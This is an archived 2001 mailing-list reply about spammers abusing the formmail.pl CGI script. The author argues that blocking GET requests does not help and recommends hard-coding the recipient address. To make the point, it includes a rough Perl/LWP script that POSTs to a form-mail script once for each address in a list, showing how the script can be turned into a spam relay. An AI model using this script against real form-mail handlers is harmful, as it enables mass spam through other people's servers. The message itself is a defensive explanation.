Re: spamming via formail.pl

From: Brian Hatch (focus-linux@ifokr.org)
Date: 09/26/01 

Date: Tue, 25 Sep 2001 19:50:00 -0700
From: Brian Hatch <focus-linux@ifokr.org>
To: "Moeller, Arno" <am@bogs.de>
Subject: Re: spamming via formail.pl
Message-ID: <20010925195000.K598@ifokr.org>

> I've patched formmail in the following way to prevent this from
> happening and to log the spamming attempts:
>
> # Determine the form's REQUEST_METHOD (GET or POST) and split the form
> # fields up into their name-value pairs. If the REQUEST_METHOD was
> # not GET or POST, send an error.

Sure, that blocks GET, but it's really trivial to do a POST without
actually knowing how HTTP works. Curl will take form data to post,
for example, or you could use a few lines of perl (off the top of
my head, it may not be completely correct syntax):

#!/usr/bin/perl

use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;

my($ua) = LWP::UserAgent->new();

while (<>) {
        chomp;
        my($req) = POST "http://www.example.com/cgi-bin/formail.pl"
                [ to => $_,
                  from => "spammer@example.org"
                  ... ];
        $ua->request($req) or print STDERR "Whoops, it didn't work for $_.\n";
}

and then run it with

        spammer$ perlscript < emailaddrs

(I don't actually remember the correct form variable names for formail,
but you get the idea.)

Yes, you could use the referer header to see if they're 'legit' but
we all know that's forgable too. What you should do is hard code the
addr to which the mail goes in the formail.pl script, rather than
having it rely on form data. That way the worst the spammers can do
is target that one email address. 

--
Brian Hatch                God be between you and harm,
   Systems and              in all the empty places
   Security Engineer        where you must walk.
www.hackinglinuxexposed.com

Every message PGP signed